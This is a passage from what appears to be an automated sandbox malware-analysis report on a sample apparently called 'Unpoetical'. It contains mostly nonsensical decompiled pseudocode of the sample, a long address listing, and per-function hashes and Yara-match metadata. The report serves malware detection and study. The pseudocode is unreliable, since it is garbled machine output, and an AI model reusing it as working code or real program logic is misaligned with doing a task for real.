				 *_t121 =  *_t121 + _t121;
				 *_t121 =  *_t121 + _t121;
				 *0x0000001D =  *0x0000001D + 0x1c;
				asm("lock xor [ecx], al");
				_t158 = _t157 + _t157;
				asm("invalid");
				 *0x0000001D =  *0x0000001D | 0x0000001c;
				 *0x0000001D =  *0x0000001D + 0x1c;
				 *0x0000001D = 0x1d +  *0x0000001D;
				 *0x0000001D =  *0x0000001D + 0x1c;
				_t124 = 0x1d +  *0x0000001D;
				 *_t124 =  *_t124 + 0x1c;
				goto 0x60401a11;
				asm("sbb al, [eax]");
				_t125 = _t124 + 1;
				 *((intOrPtr*)( &(_t158[0x1e0010]) + _t125)) =  *((intOrPtr*)( &(_t158[0x1e0010]) + _t125)) + _t168;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125;
				 *((intOrPtr*)(_t170 - 0x70000000)) =  *((intOrPtr*)(_t170 - 0x70000000)) + 0x3a1a6a0a;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				 *_t125 =  *_t125 + 0x1c;
				_t44 = _t178 + 0x6e;
				 *_t44 =  *((intOrPtr*)(_t178 + 0x6e)) + _t168;
				_t206 =  *_t44;
				if(_t206 >= 0) {
					if(_t206 != 0) {
						asm("arpl [ecx+0x6c], sp");
						 *0x3A1A6A78 =  *((intOrPtr*)(0x3a1a6a78)) + 0x3a1a6a0a;
						if ( *[fs:edi+0x62] * 0x6c >= 0) goto L11;
						 *((intOrPtr*)(0x3a1a6a78)) =  *((intOrPtr*)(0x3a1a6a78)) + 0x3a1a6a0a;
						_t178 =  *[fs:edi+0x62] * 0x6c;
						if ( *[fs:edi+0x62] * 0x6c >= 0) goto L12;
						_push(_t125);
						 *_t125 =  *_t125 + 0x1c;
						 *0x3a1a6a0a =  *0x3a1a6a0a + _t168;
						_t148 = _t168;
						_t168 = _t125;
						_t149 = _t148 & 0x3a1a6a0a;
						ss = _t148;
						asm("std");
						asm("outsd");
						_push(_t168);
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						asm("adc [eax], al");
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						asm("lodsb");
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						 *_t149 =  *_t149 + 0x1c;
						_t125 = _t158 + _t149;
						asm("sbb [eax], al");
					}
					_t193 = _t193 - 1;
					 *_t125 =  *_t125 + _t125;
				}
				 *_t125 =  *_t125 + _t168;
				 *_t125 =  *_t125 + _t125;
				asm("sti");
				asm("invalid");
				_pop(_t180);
				_t171 = _t170 & _t168;
				_t194 = _t193 ^  *_t158;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *((intOrPtr*)(_t180 - 0x79)) =  *((intOrPtr*)(_t180 - 0x79)) + _t168;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *_t125 =  *_t125 + _t125;
				asm("enter 0x4034, 0x0");
				asm("pushfd");
				 *_t125 =  *_t125 + _t125;
				 *0x3a1a6a0a =  *0x3a1a6a0a + _t125;
				 *0x3a1a6a0a =  *0x3a1a6a0a + _t125;
				 *((intOrPtr*)(_t125 + 0x4021)) =  *((intOrPtr*)(_t125 + 0x4021)) + _t125;
				 *_t125 =  *_t125 + _t125;
				_t126 = _t125 + _t125;
				asm("invalid");
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				_t128 = (_t126 & 0x00000022) + 1;
				 *((intOrPtr*)(_t128 + 0x42)) =  *((intOrPtr*)(_t128 + 0x42)) + 0x3a1a6a0a;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				_t129 = _t128 + 0x3a1a6a0a;
				_push(_t168);
				asm("pushad");
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *((intOrPtr*)(_t129 + 0x1b)) =  *((intOrPtr*)(_t129 + 0x1b)) + _t158;
				_t130 = _t129 + 1;
				 *0x3a1a6a0a =  *0x3a1a6a0a + _t130;
				 *_t130 =  *_t130 + _t130;
				 *((intOrPtr*)(_t194 + 0xffffffffffff0081)) =  *((intOrPtr*)(_t194 + 0xffffffffffff0081)) + _t168;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *((intOrPtr*)(_t130 + 0x1b)) =  *((intOrPtr*)(_t130 + 0x1b)) + _t158;
				_t131 = _t130 + 1;
				 *0x3a1a6a0a =  *0x3a1a6a0a + _t131;
				 *_t131 =  *_t131 + _t131;
				 *((intOrPtr*)(_t131 + 0x401b)) =  *((intOrPtr*)(_t131 + 0x401b)) + _t131;
				 *_t131 =  *_t131 + _t131;
				 *((intOrPtr*)(_t158 +  &(_t158[0x10]))) =  *((intOrPtr*)(_t158 +  &(_t158[0x10]))) + _t158;
				 *_t168 =  *_t168 + _t131;
				 *_t131 =  *_t131 + _t131;
				 *((intOrPtr*)(_t131 + 0x401b)) =  *((intOrPtr*)(_t131 + 0x401b)) + _t131;
				 *((intOrPtr*)(_t171 + 0x6c006801)) =  *((intOrPtr*)(_t171 + 0x6c006801)) + _t168;
				asm("sbb eax, [eax]");
				asm("int3");
				_t133 = _t131 + _t168 &  *_t168;
				 *_t133 =  *_t133 + _t133;
				 *_t133 =  *_t133 + _t133;
				if( *_t133 >= 0) {
					 *[fs:esp+esi+0x34940040] =  *[fs:esp+esi+0x34940040] + _t133;
					_t144 = _t133 + 1;
					 *_t144 =  *_t144 + _t144;
					_t145 = _t144 | 0x00003400;
					 *((intOrPtr*)(_t194 + 0x81)) =  *((intOrPtr*)(_t194 + 0x81)) + _t145;
					_t146 = _t145 +  *_t145;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					 *_t146 =  *_t146 + _t146;
					asm("rcr byte [ebx], 1");
					_t147 = _t146 + 1;
					 *((intOrPtr*)(_t147 - 0x4bff9c28)) =  *((intOrPtr*)(_t147 - 0x4bff9c28)) + _t147;
					_t133 = _t147 ^ 0x00000040;
					 *0x3a1a6a0a =  *0x3a1a6a0a + _t133;
				}
				 *_t133 =  *_t133 + _t133;
				_t135 = _t133 +  *_t133 + 1;
				 *_t171 =  *_t171 + _t158;
				 *_t135 =  *_t135 + _t158;
				 *_t135 =  *_t135 + _t135;
				 *((intOrPtr*)(_t135 + 0x23)) =  *((intOrPtr*)(_t135 + 0x23)) + _t158;
				_t136 = _t135 + 1;
				_t159 = _t158 + _t158;
				asm("invalid");
				 *_t136 =  *_t136 + 1;
				 *_t136 =  *_t136 + _t136;
				 *_t136 =  *_t136 + _t136;
				 *_t136 =  *_t136 + _t136;
				 *((intOrPtr*)(_t194 + _t159)) =  *((intOrPtr*)(_t194 + _t159)) + _t159;
				_t139 = _t136 + 0x00000001 + _t159 | 0x00000061;
				 *((intOrPtr*)(_t139 + 0x23)) =  *((intOrPtr*)(_t139 + 0x23)) + 0x3a1a6a0a;
				_t140 = _t139 + 1;
				_t160 = _t159 + _t159;
				asm("invalid");
				 *_t140 =  *_t140 + 1;
				 *_t140 =  *_t140 + _t140;
				_t89 = _t140 + 0x401b;
				 *_t89 =  *((intOrPtr*)(_t140 + 0x401b)) + _t140;
				asm("sbb eax, [eax]");
				if( *_t89 >= 0) {
					 *0xFFFFFFFFFFFF0059 =  *((intOrPtr*)(0xffffffffffff0059)) + _t168;
					_t140 = _t140 + 2;
					 *((intOrPtr*)(_t140 + _t160 + 0x40)) =  *((intOrPtr*)(_t140 + _t160 + 0x40)) + _t160;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
					 *_t140 =  *_t140 + _t140;
				}
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				 *_t140 =  *_t140 + _t140;
				_t141 = _t140 + 1;
				 *_t141 =  *_t141 + _t141;
				asm("sbb eax, [eax]");
				if( *_t141 >= 0) {
					 *((intOrPtr*)(0xffffffffffff0059)) =  *((intOrPtr*)(0xffffffffffff0059)) + _t168;
					_t141 = _t141 + 2;
					 *((intOrPtr*)(_t141 + _t160 + 0x40)) =  *((intOrPtr*)(_t141 + _t160 + 0x40)) + _t160;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
					 *_t141 =  *_t141 + _t141;
				}
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				asm("hlt");
				 *_t141 =  *_t141 + _t141;
				 *((intOrPtr*)(_t141 + 0x4021)) =  *((intOrPtr*)(_t141 + 0x4021)) + _t141;
				 *_t141 =  *_t141 + _t141;
				 *((intOrPtr*)(_t141 - 0x3e)) =  *((intOrPtr*)(_t141 - 0x3e)) + _t168;
				_push(_t141);
				return _t141;
			}













































      0x00401888
      0x0040188d
      0x00401892
      0x00401894
      0x00401896
      0x00401898
      0x0040189a
      0x0040189c
      0x0040189d
      0x0040189f
      0x004018a1
      0x004018a3
      0x004018a9
      0x004018aa
      0x004018ad
      0x004018ae
      0x004018b2
      0x004018b4
      0x004018b6
      0x004018b8
      0x004018ba
      0x004018bc
      0x004018be
      0x004018c0
      0x004018c2
      0x004018c4
      0x004018c5
      0x004018c6
      0x004018cb
      0x004018d0
      0x004018d2
      0x004018d4
      0x004018d6
      0x004018da
      0x004018dc
      0x004018e6
      0x004018e9
      0x004018ea
      0x004018eb
      0x004018ec
      0x004018ee
      0x004018f3
      0x004018f7
      0x004018fe
      0x004018ff
      0x00401908
      0x00401909
      0x0040190c
      0x0040190c
      0x0040190d
      0x0040190f
      0x00401911
      0x00401913
      0x00401915
      0x00401917
      0x00401919
      0x0040191b
      0x0040191d
      0x0040191f
      0x00401921
      0x00401923
      0x00401925
      0x00401927
      0x00401929
      0x0040192b
      0x0040192d
      0x0040192f
      0x00401931
      0x00401932
      0x00401934
      0x00401937
      0x00401939
      0x0040193c
      0x0040193c
      0x0040193d
      0x0040193e
      0x004019a6
      0x004019a6
      0x004019a7
      0x004019aa
      0x00000000
      0x00401940
      0x00401940
      0x00401941
      0x00401943
      0x00401946
      0x00401949
      0x00401950
      0x00401955
      0x00401956
      0x00401958
      0x0040195a
      0x0040195c
      0x0040195d
      0x00401960
      0x00401964
      0x00401968
      0x00401969
      0x0040196a
      0x0040196c
      0x00401972
      0x00401977
      0x00401979
      0x0040197b
      0x0040197c
      0x0040197e
      0x0040197f
      0x00401982
      0x00401985
      0x00401987
      0x00401990
      0x00401995
      0x00401997
      0x00401999
      0x0040199b
      0x0040199d
      0x0040199f
      0x004019a1
      0x004019a3
      0x00000000
      0x004019a3
      0x004019ab
      0x004019ab
      0x004019ad
      0x004019af
      0x004019b2
      0x004019b3
      0x004019b5
      0x004019b5
      0x00401941
      0x004019b7
      0x004019b9
      0x004019bb
      0x004019bd
      0x004019c1
      0x004019c4
      0x004019c5
      0x004019c6
      0x004019cb
      0x004019cd
      0x004019cf
      0x004019d1
      0x004019d3
      0x004019d5
      0x004019d7
      0x004019da
      0x004019dc
      0x004019de
      0x004019e0
      0x004019e2
      0x004019e4
      0x004019e8
      0x004019ea
      0x004019ec
      0x004019ee
      0x004019f0
      0x004019f2
      0x004019f7
      0x004019f9
      0x004019fc
      0x004019fe
      0x00401a00
      0x00401a02
      0x00401a04
      0x00401a06
      0x00401a08
      0x00401a0a
      0x00401a0c
      0x00401a11
      0x00401a16
      0x00401a17
      0x00401a1e
      0x00401a20
      0x00401a23
      0x00401a29
      0x00401a2b
      0x00401a2d
      0x00401a2f
      0x00401a31
      0x00401a33
      0x00401a35
      0x00401a37
      0x00401a39
      0x00401a3b
      0x00401a3b
      0x00401a3b
      0x00401a3e
      0x00401a40
      0x00401a43
      0x00401a46
      0x00401a4e
      0x00401a53
      0x00401a56
      0x00401a5b
      0x00401a60
      0x00401a61
      0x00401a63
      0x00401a65
      0x00401a65
      0x00401a6e
      0x00401a70
      0x00401a71
      0x00401a72
      0x00401a73
      0x00401a74
      0x00401a76
      0x00401a78
      0x00401a7a
      0x00401a7c
      0x00401a7e
      0x00401a80
      0x00401a82
      0x00401a84
      0x00401a86
      0x00401a88
      0x00401a8a
      0x00401a8c
      0x00401a8e
      0x00401a90
      0x00401a92
      0x00401a94
      0x00401a96
      0x00401a98
      0x00401a9a
      0x00401a9c
      0x00401a9e
      0x00401aa0
      0x00401aa1
      0x00401aa3
      0x00401aa5
      0x00401aa7
      0x00401aa9
      0x00401aa9
      0x00401aac
      0x00401aad
      0x00401aad
      0x00401aaf
      0x00401ab2
      0x00401aba
      0x00401abc
      0x00401abe
      0x00401abf
      0x00401ac1
      0x00401ac8
      0x00401aca
      0x00401acc
      0x00401ace
      0x00401ad0
      0x00401ad2
      0x00401ad4
      0x00401ad6
      0x00401ad8
      0x00401adb
      0x00401add
      0x00401adf
      0x00401ae1
      0x00401ae3
      0x00401ae5
      0x00401ae7
      0x00401ae9
      0x00401aeb
      0x00401aed
      0x00401aef
      0x00401af2
      0x00401af4
      0x00401af6
      0x00401af8
      0x00401afc
      0x00401afd
      0x00401aff
      0x00401b01
      0x00401b03
      0x00401b09
      0x00401b0b
      0x00401b12
      0x00401b14
      0x00401b16
      0x00401b1a
      0x00401b1b
      0x00401b1f
      0x00401b21
      0x00401b23
      0x00401b25
      0x00401b26
      0x00401b27
      0x00401b29
      0x00401b2b
      0x00401b2d
      0x00401b2f
      0x00401b31
      0x00401b33
      0x00401b36
      0x00401b37
      0x00401b39
      0x00401b3b
      0x00401b3f
      0x00401b41
      0x00401b43
      0x00401b46
      0x00401b47
      0x00401b49
      0x00401b4b
      0x00401b51
      0x00401b53
      0x00401b57
      0x00401b59
      0x00401b5b
      0x00401b61
      0x00401b69
      0x00401b6c
      0x00401b6d
      0x00401b70
      0x00401b72
      0x00401b74
      0x00401b76
      0x00401b7e
      0x00401b7f
      0x00401b82
      0x00401b87
      0x00401b8e
      0x00401b90
      0x00401b92
      0x00401b94
      0x00401b96
      0x00401b98
      0x00401b9a
      0x00401b9b
      0x00401ba1
      0x00401ba3
      0x00401ba3
      0x00401ba4
      0x00401ba8
      0x00401ba9
      0x00401bab
      0x00401bad
      0x00401baf
      0x00401bb2
      0x00401bb3
      0x00401bb5
      0x00401bb7
      0x00401bb9
      0x00401bbb
      0x00401bbd
      0x00401bbf
      0x00401bc5
      0x00401bc7
      0x00401bca
      0x00401bcb
      0x00401bcd
      0x00401bcf
      0x00401bd1
      0x00401bd3
      0x00401bd3
      0x00401bd9
      0x00401bdc
      0x00401bdf
      0x00401be2
      0x00401be3
      0x00401be7
      0x00401be9
      0x00401beb
      0x00401bed
      0x00401bef
      0x00401bf1
      0x00401bf3
      0x00401bf5
      0x00401bf5
      0x00401bf6
      0x00401bf8
      0x00401bfa
      0x00401bfc
      0x00401bfe
      0x00401c00
      0x00401c02
      0x00401c04
      0x00401c06
      0x00401c08
      0x00401c0a
      0x00401c0c
      0x00401c0e
      0x00401c10
      0x00401c12
      0x00401c14
      0x00401c16
      0x00401c18
      0x00401c1a
      0x00401c1c
      0x00401c1e
      0x00401c22
      0x00401c23
      0x00401c25
      0x00401c28
      0x00401c2b
      0x00401c2e
      0x00401c2f
      0x00401c33
      0x00401c35
      0x00401c37
      0x00401c39
      0x00401c3b
      0x00401c3d
      0x00401c3f
      0x00401c41
      0x00401c41
      0x00401c42
      0x00401c44
      0x00401c46
      0x00401c48
      0x00401c4a
      0x00401c4c
      0x00401c4e
      0x00401c50
      0x00401c52
      0x00401c54
      0x00401c56
      0x00401c58
      0x00401c5a
      0x00401c5c
      0x00401c5e
      0x00401c60
      0x00401c62
      0x00401c64
      0x00401c66
      0x00401c68
      0x00401c6a
      0x00401c6c
      0x00401c6e
      0x00401c70
      0x00401c72
      0x00401c74
      0x00401c76
      0x00401c78
      0x00401c7a
      0x00401c7c
      0x00401c7e
      0x00401c80
      0x00401c82
      0x00401c84
      0x00401c86
      0x00401c88
      0x00401c8a
      0x00401c8c
      0x00401c8e
      0x00401c90
      0x00401c92
      0x00401c94
      0x00401c96
      0x00401c98
      0x00401c9a
      0x00401c9c
      0x00401c9e
      0x00401ca0
      0x00401ca2
      0x00401ca4
      0x00401ca6
      0x00401ca8
      0x00401caa
      0x00401cac
      0x00401cae
      0x00401cb0
      0x00401cb1
      0x00401cb3
      0x00401cb9
      0x00401cbb
      0x00401cbc
      0x00401cbd

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: #100
      • String ID: VB5!6&*
      • API String ID: 1341478452-3593831657
      • Opcode ID: f273f6f2012fbdbff915bdd7bae8f9596dbd4e27527cf414f9ad0408a0d1861b
      • Instruction ID: 538001b2788ca6c541725e3c4529f9deafef6f5280b4d6ed64712586400d535f
      • Opcode Fuzzy Hash: f273f6f2012fbdbff915bdd7bae8f9596dbd4e27527cf414f9ad0408a0d1861b
      • Instruction Fuzzy Hash: C441EAA444E7C04FD3238BB44E665A23FB09E1321470A82EBC8D6CF0B3D21D594AD766
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 020EE191, Relevance: 2.8, Strings: 2, Instructions: 278COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: s2o$u`d
      • API String ID: 0-1347142617
      • Opcode ID: c08e6694f8bbe9e2f13e019034a2a8320f8f45ebc00067ebf4df0bd76c96b762
      • Instruction ID: 4db01636edc44db2da91fc913b57e847ed7e611f33abb4c08c88a78699efdbad
      • Opcode Fuzzy Hash: c08e6694f8bbe9e2f13e019034a2a8320f8f45ebc00067ebf4df0bd76c96b762
      • Instruction Fuzzy Hash: 10B1DB716443899FCF799F24CD50BEE3BA2BF88350F50852E9D4E9B610D7318A82DB52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020EC130, Relevance: 2.1, Strings: 1, Instructions: 813COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: [/UC
      • API String ID: 0-641789785
      • Opcode ID: 6b87d63f75abd6a6a40ead3c79d702a03eb28a91f81420f2fff0eb227e465f65
      • Instruction ID: 6b15642bc3dfd7f81718d2a2cb433dfe2f7486b2abca734abdbb22ad28da6271
      • Opcode Fuzzy Hash: 6b87d63f75abd6a6a40ead3c79d702a03eb28a91f81420f2fff0eb227e465f65
      • Instruction Fuzzy Hash: 4372FBB26083489FDBB49F24CD997EABBB2FF55310F554129DC8A9B220C3345A85DF42
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020E9768, Relevance: 2.0, Strings: 1, Instructions: 704COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: [/UC
      • API String ID: 0-641789785
      • Opcode ID: 890ac87bd7759279fb0cf4f20293f6be81f6a1c26c2800c6530d05076b1f9353
      • Instruction ID: 6deaca4b058a883ae775a16d68e30f17f94277eae4fb0c7c5767d27580141502
      • Opcode Fuzzy Hash: 890ac87bd7759279fb0cf4f20293f6be81f6a1c26c2800c6530d05076b1f9353
      • Instruction Fuzzy Hash: E562EBB2604349DFDB749F28CD557EABBA2FF55310F45811ADC8A9B220D3349A81CB82
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020F4B8C, Relevance: .5, Instructions: 528COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 53357278e0895aa7acc481bc4c9034f6b9ce4408fdc102f52ac1013f91585933
      • Instruction ID: eac64808e199b6b97989fac2f7cb99973d57331bba2430732d3e444820d56f3c
      • Opcode Fuzzy Hash: 53357278e0895aa7acc481bc4c9034f6b9ce4408fdc102f52ac1013f91585933
      • Instruction Fuzzy Hash: 022207715483C58FCBB6CF38C9987DABFE2AF56320F49829AC9994F696D3308541C712
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020E168F, Relevance: .2, Instructions: 204COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d469130446313c9c787f96a61ac2872a00f6690d7d5155390aa07b6dd557b1eb
      • Instruction ID: 72693d37d91a3489e6b86f02637bff8103d46425e4c81969c755c1ad209fdf31
      • Opcode Fuzzy Hash: d469130446313c9c787f96a61ac2872a00f6690d7d5155390aa07b6dd557b1eb
      • Instruction Fuzzy Hash: 127104775983809FDBA1DE61C4EC598FF75FB1236A724016CD4D98A232D333188BAE19
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020F2FD3, Relevance: .0, Instructions: 44COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7cd527627b9030b5b3568b26129bc40a4cdceb8092977edee06aab5a42e84d47
      • Instruction ID: ee888250232ee74c7fceb12a071a33993e347a8e28c7025a3ff589bb497412f3
      • Opcode Fuzzy Hash: 7cd527627b9030b5b3568b26129bc40a4cdceb8092977edee06aab5a42e84d47
      • Instruction Fuzzy Hash: 07115B756447948FCBB9DF28C894BE977E0BB58360F4641AADD0A9BA20C730AA40DA40
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020EC607, Relevance: .0, Instructions: 6COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
      • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
      • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
      • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020ED0B4, Relevance: .0, Instructions: 6COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
      • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
      • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020F2697, Relevance: .0, Instructions: 4COMMON
      Download Yara Rule
